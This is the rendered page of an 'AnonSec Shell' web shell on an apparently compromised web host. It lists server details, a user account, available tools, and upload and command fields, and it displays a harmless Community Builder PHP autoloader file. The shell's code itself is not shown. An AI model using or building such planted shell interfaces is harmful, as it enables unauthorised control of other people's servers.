AnonSec Shell
Server IP : 54.36.91.62  /  Your IP : 216.73.217.94
Web Server : Apache
System : Linux webm013.cluster127.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
User : coopiak ( 151928)
PHP Version : 8.3.23
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/coopiak/amisdesseniors-fr/nice/libraries/CBLib/CB/Legacy/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/coopiak/amisdesseniors-fr/nice/libraries/CBLib/CB/Legacy/LegacyLoader.php
<?php
/**
* CBLib, Community Builder Library(TM)
* @version $Id: 7/7/14 2:25 PM $
* @package CBLib\Legacy
* @copyright (C) 2004-2025 www.joomlapolis.com / Lightning MultiCom SA - and its licensors, all rights reserved
* @license http://www.gnu.org/licenses/old-licenses/gpl-2.0.html GNU/GPL version 2
*/

namespace CB\Legacy;

use CBLib\Core\AutoLoader;

defined('CBLIB') or die();

/**
 * CBLib\Legacy\LegacyLoader Class implementation
 */
class LegacyLoader
{
	protected static $autoloaded	=	false;

	/**
	 * Constructor
	 */
	public function __construct( )
	{
		if ( self::$autoloaded ) {
			return;
		}

		self::$autoloaded			=	true;

		AutoLoader::registerMap( '/^((?:cb|(?:mos)?comprofiler)[^\\\\]+|imgToolBox|PclZip|Archive_Tar|PEAR|TOOLBAR_usersextras)$/i', 'CB/Legacy/$1.php' );
		// Fix for CB 1.9 plugins dblookupfield and autowelcome:
		AutoLoader::registerClass( 'CBUser', 'CB/Legacy/CBuser.php' );
		// Fix for old CB modules:
		AutoLoader::registerClass( 'cbUser', 'CB/Legacy/CBuser.php' );

		// We alias these classes for faster loading and also so that instanceof is true:
		class_alias( '\CB\Database\Table\ComprofilerTable',	'moscomprofiler' );
		class_alias( '\CB\Database\Table\FieldTable',		'moscomprofilerFields' );
		class_alias( '\CB\Database\Table\FieldValueTable',	'moscomprofilerFieldValues' );
		class_alias( '\CB\Database\Table\ListTable',		'moscomprofilerLists' );
		class_alias( '\CB\Database\Table\MemberTable',		'moscomprofilerMember' );
		class_alias( '\CB\Database\Table\PluginTable',		'moscomprofilerPlugin' );
		class_alias( '\CB\Database\Table\TabTable',			'moscomprofilerTabs' );
		class_alias( '\CB\Database\Table\UserTable',		'moscomprofilerUser' );
		class_alias( '\CB\Database\Table\UserReportTable',	'moscomprofilerUserReport' );
	}
}

Anon7 - 2022
AnonSec Team